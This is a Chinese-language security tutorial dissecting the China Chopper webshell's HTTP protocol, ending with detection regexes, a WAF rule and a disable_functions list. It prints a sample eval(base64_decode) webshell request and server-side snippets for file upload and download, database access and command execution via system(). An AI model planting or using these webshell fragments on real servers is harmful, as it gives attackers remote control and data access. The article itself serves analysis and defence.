从抓包到解码：手把手带你拆解中国菜刀（Chopper）与Webshell的通信协议

Web安全通信协议逆向分析：从流量解码到防御实践

在网络安全攻防对抗的战场上，理解攻击工具的通信机制往往比单纯使用工具更有价值。当我们能够拆解这些工具的通信协议时，不仅能更高效地识别攻击行为，还能针对性设计防御策略。本文将采用逆向工程视角，带您深入分析一种典型Web控制工具的通信模式。

1. 通信协议分析基础准备

进行协议逆向分析前，需要搭建合适的实验环境。建议使用隔离的虚拟机环境，配置以下组件：

• 网络抓包工具：Wireshark（全流量捕获）配合Burp Suite（HTTP协议分析）
• 目标环境：PHP 5.6 + Apache/Nginx组合（注意：PHP 7+已对某些函数做了安全限制）
• 调试工具：Chrome开发者工具、Postman用于请求重构

实验环境务必与生产网络物理隔离，所有测试应在授权范围内进行

典型通信流程可分为三个阶段：

1. 初始握手：验证Webshell存在性并获取基础环境信息
2. 会话维持：通过特定参数保持控制通道
3. 命令执行：传输操作指令并返回结果

2. 协议字段深度解码

通过抓包分析，我们可以观察到几个关键参数在通信过程中的作用：

典型请求体结构：

POST /shell.php HTTP/1.1 Host: target.com Content-Type: application/x-www-form-urlencoded test=@eval(base64_decode($_POST[z0]))&z0=base64_payload

解码后的PHP代码通常包含这些关键函数：

@ini_set("display_errors","0"); // 关闭错误显示 @set_time_limit(0); // 取消执行时间限制 eval(base64_decode($payload)); // 动态执行解码后的指令

3. 功能实现机制剖析

3.1 文件管理系统

文件操作采用"指令-响应"模式，核心步骤包括：

1. 路径探测：

   • 通过$_SERVER["SCRIPT_FILENAME"]获取绝对路径
   • 使用opendir/readdir遍历目录

2. 文件上传：

   $buf = ""; for($i=0;$i<strlen($c);$i+=2) $buf .= urldecode("%".substr($c,$i,2)); fwrite(fopen($f,"w"),$buf);

3. 文件下载：

   $fp = @fopen($F,"r"); if(@fgetc($fp)){ @readfile($F); }

3.2 数据库管理模块

数据库连接采用分段凭证传输：

$ar = explode("choraheiheihei", $conf); // 分隔符拆分 $T = @mysql_connect($ar[0],$ar[1],$ar[2]); @mysql_query("SET NAMES utf8");

SQL执行流程：

1. 接收Base64编码的SQL语句
2. 通过mysql_query执行
3. 结果以制表符分隔格式返回

3.3 虚拟终端实现

命令执行关键代码段：

$r = "{$p} {$c}"; // 组合命令和参数 @system($r." 2>&1",$ret); // 执行系统命令 print ($ret!=0)?"ret={$ret}":"";

特殊处理包括：

• Windows/Linux路径前缀自动判断
• 错误输出重定向
• 返回码检查

4. 安全检测与防御方案

基于协议分析结果，可设计多维度检测策略：

流量特征检测点：

• 频繁出现的z0、z1、z2参数名
• Base64编码数据长度异常
• 连续的@符号使用

服务器端防护建议：

1. 函数禁用列表：

   disable_functions = eval,exec,passthru,shell_exec,system

2. 日志监控规则示例（正则表达式）：

   (\@eval\(|\@system\(|\@exec\()|(base64_decode\([^)]+\))

3. Web应用防火墙规则示例：

   { "rule": "POST_PARAM", "pattern": "z[0-9]=[a-zA-Z0-9+/=]{100,}", "action": "block" }

网络层防御措施：

在实际防御部署中，建议采用分层防御策略，结合流量分析和行为分析，建立从网络边界到主机的完整防护体系。同时保持对新型通信模式的持续研究，及时更新检测规则库。